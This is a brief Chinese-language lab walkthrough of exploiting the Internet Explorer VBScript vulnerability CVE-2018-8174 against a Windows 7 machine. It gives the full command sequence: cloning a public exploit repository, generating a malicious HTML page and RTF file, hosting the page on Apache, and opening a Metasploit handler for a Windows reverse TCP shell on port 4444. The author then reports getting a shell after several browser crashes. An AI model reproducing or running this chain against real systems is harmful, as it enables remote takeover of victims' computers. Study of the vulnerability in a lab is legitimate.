安装CVE-2018-8174_EXP
git clone https://github.com/iBearcat/CVE-2018-8174_EXP .git
然后发现没克隆下来,所以这里我直接用xshell上传了zip包并解压在本目录
进入我们的文件目录
cd CVE-2018-8174_EXP-master/
生成恶意html文件
python CVE-2018-8174.py -u http://192.168.132.144/exploit.html -o hack.rtf -i 192.168.132.144 -p 4444
将文件移动到apache根目录
mv exploit.html /var/www/html
开一下apache服务
service apache2 start
Ctrl+shift+t重新开一个页面开启监听
msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.132.144
msf5 exploit(multi/handler) > set LPORT 4444
msf5 exploit(multi/handler) > run
于是我们去win7访问
但是可能是连接不稳定的问题,这里我一旦访问这个网址浏览器就崩掉,所以这里断了好几次才成功
whoami命令打错了。。。chcp 65001解决一下乱码
当然,如果在物理机上尝试,就会被杀毒软件捕捉到